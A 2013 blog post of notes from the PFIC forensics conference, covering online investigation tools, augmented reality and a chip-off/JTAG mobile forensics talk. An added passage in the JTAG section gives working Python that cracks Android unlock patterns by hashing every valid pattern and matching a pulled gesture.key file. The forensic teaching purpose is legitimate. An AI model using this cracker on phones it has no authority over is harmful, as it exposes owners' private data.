Thursday, November 14, 2013

Daily Blog #144 PFIC Day 1 Afternoon Sessions

Hello Reader,
          I took more notes yesterday and I'm taking more notes this morning. I'm posting these in the hopes that you'll use them with the slides that will be posted so you can get the information presented here that is outside of the slides.

1:30pm Session Social Media Insights

This session was being presented by a woman whose company provides PI services, specifically online research about people and companies.
Websites and techniques for social media investigations
Finding links and images through duckduckgo
Finding discussion posts on omgili
Finding classified ads with searchtempest
Using ixquick to search multiple engines and find hits in the 'private web' with a meta search
I left for a conference call at this point. If you need to do online/social/web investigations of prior posts, this presentation does give some good links.

2:30pm Session Augmented Reality Forensics

This wasn't a forensic session per se; it's more of a futurist looking at the state of upcoming and emerging technology and what that may mean for us in the DFIR field. Still an interesting talk from a good presenter.
AR isn't perfect yet
will make a new range of forensic tools and forensic possibilities
The internet of things is coming and with it IoT forensics

4:00pm Session Chip Off or Jtag it

This was an interesting session mainly because of Zeke's personality but the tech content was a bit light for a conference that also had a hands on chip off lab taking place a few doors down.
 
New Zealand accents make presentations more interesting
Good jokes so far, hoping the content is as good
Overview of crimes committed and the evidence that could be found on mobile devices
Terrorists are now shooting their phones before being caught; apparently you should target the number 7 key to kill the SIM and possibly the NVRAM chip.
Starting his review of forensics with Edmond Locard 'every contact leaves a trace'
Now comparing computer vs. cell phone forensics. I'm going to be patient, but I'm wondering if he is misjudging his audience.
A little vendor bashing on how they market their logical/physical analysis, always appreciated
'forensic explorer' is now called 'recover my files' which is around $1,000 USD and he has had good success in carving from android unallocated. Not sure how that compares to any other carving tool against the same data.
Flasher boxes are hacker boxes and break into devices? I don't think I agree with the analogy but I understand the meaning.
Discussion on whether these procedures from a flasher box, JTAG, chip off, and even vendor software tools are forensically sound, since many are modifying the original evidence in order to extract the data
The process is what makes something forensically sound not the tool, I agree
He is now going over photographing a phone as a first step before cracking it open.
Now getting into something interesting, a survey of flasher boxes
The comedy here is winning the audience, enjoying this
Now discussing chip off, and discussing heat versus infrared for removing chips
Why would we go to chip off, because the phone isn't supported by any automated forensic software tool
Some phones, especially the off-market clone phones (fake BlackBerry in this example), may appear normal but will actually be encrypted or have multiple subsystems, making normal chip off unhelpful or pointless
Next example is a phone that looks like a remote car key fob
moving on to physically damaged phones
The speaker seems to think that Jonathan Rajewski and I are part of a Utah based cell phone forensics lab.  We can't bear to tell him we are not so we are going along with it.
Regardless of content come see Zeke just for the jokes
Sometimes repair is all you need to do instead of a chip off
Now showing generic best practice guidelines for the UK and USA
Discussing how flasher boxes and other types of phone modification tools don't produce forensic hashes, as they were not made for this work; suggested putting the evidence in a forensic image afterwards to allow for verification after the fact.
Discussion of dealing with binary dumps from flashers/jtag/chip off dumps. Common methods are just feeding it to cell phone tools that will carve for known cell patterns.
this presentation is now getting a bit trippy with perspective art/illusions
Breaking down binary patterns as a method for determining data structures
Discussion on bypassing Android locked phones
If USB debugging is turned on, then your standard tools can get access to the file system
If not, moving on to chip off and the destructive process
Moving on to JTAG and showing the RIFF box, which supports multiple pin-outs
Youtube is the database for learning how to take phones apart and find jtags
Showing how the raw dump of the JTAG output is a large hex dump, showing putting it into Forensic Explorer again
Discussing using rainbow tables of possible SHA-1 gesture keys to determine which pattern locked the phone
Get the pattern lock and then pull the data off the phone using an automated solution to pull the intact file system for you is his recommendation.
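The gesture-key lookup mentioned above works because Android of that era (2.x through 4.x; later releases changed the scheme) stored the unlock pattern in /data/system/gesture.key as an unsalted SHA-1 of the touched points, each point a single byte 0-8 numbered row-major on the 3x3 grid. The keyspace is small enough (389,112 valid patterns under Android's rules: 4 to 9 distinct points, and a point that lies on the straight line between two consecutive points must already have been used) that the whole "rainbow table" is really just a dictionary you can build in under a second. The following is an added example, not code from the presentation or from any vendor tool; the file path and the sample gesture.key bytes are constructed for illustration.

```python
import hashlib

GRID_POINTS = 9  # 3x3 grid, points numbered 0-8 row-major


def _between(a, b):
    """Return the grid point lying on the straight line between a and b, or None.

    Android forces a swipe from a to b to 'pick up' that middle point unless it
    has already been used, so a pattern that skips over an unused point is invalid.
    """
    ra, ca = divmod(a, 3)
    rb, cb = divmod(b, 3)
    if (ra + rb) % 2 or (ca + cb) % 2:
        return None  # midpoint is not on the grid (e.g. 0 -> 1, or 0 -> 4)
    return ((ra + rb) // 2) * 3 + (ca + cb) // 2


def is_valid_pattern(pattern):
    """Apply Android's pattern rules: 4-9 distinct points, no skipping over unused points."""
    if not 4 <= len(pattern) <= GRID_POINTS or len(set(pattern)) != len(pattern):
        return False
    if any(not 0 <= p < GRID_POINTS for p in pattern):
        return False
    for i in range(1, len(pattern)):
        mid = _between(pattern[i - 1], pattern[i])
        if mid is not None and mid not in pattern[:i]:
            return False
    return True


def valid_patterns():
    """Enumerate every valid pattern by depth-first extension (389,112 in total)."""
    def extend(path):
        if len(path) >= 4:
            yield tuple(path)
        if len(path) == GRID_POINTS:
            return
        used = set(path)
        for nxt in range(GRID_POINTS):
            if nxt in used:
                continue
            mid = _between(path[-1], nxt)
            if mid is not None and mid not in used:
                continue  # would skip over an unused point
            path.append(nxt)
            yield from extend(path)
            path.pop()

    for start in range(GRID_POINTS):
        yield from extend([start])


def gesture_key_hash(pattern):
    """gesture.key contents for a pattern: raw SHA-1 of the point bytes, no salt."""
    return hashlib.sha1(bytes(pattern)).digest()


def build_table():
    """Precompute digest -> pattern for the whole keyspace (the 'rainbow table')."""
    return {gesture_key_hash(p): p for p in valid_patterns()}


def crack_gesture_key(digest, table):
    """Look up a 20-byte gesture.key digest; returns the pattern tuple or None."""
    return table.get(digest)


def load_gesture_key(path):
    """Read the 20 raw digest bytes from a pulled gesture.key file (hypothetical path)."""
    with open(path, "rb") as fh:
        return fh.read(20)


if __name__ == "__main__":
    # Constructed sample: the digest a phone locked with 0-1-2-5-8 would store.
    sample_digest = gesture_key_hash((0, 1, 2, 5, 8))
    table = build_table()
    print("patterns in table:", len(table))
    print("recovered pattern:", crack_gesture_key(sample_digest, table))
```

Because the digest is unsalted, the same table serves every device; once the pattern is known, the phone can be unlocked and an automated tool used to pull the intact file system, as the speaker recommends.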

That was day 1, that evening was casino night which is a lot of fun. One of the best parts of PFIC is that it isn't a huge conference and at things like casino night you have a couple hours of fun to mingle with your peers and make new friends.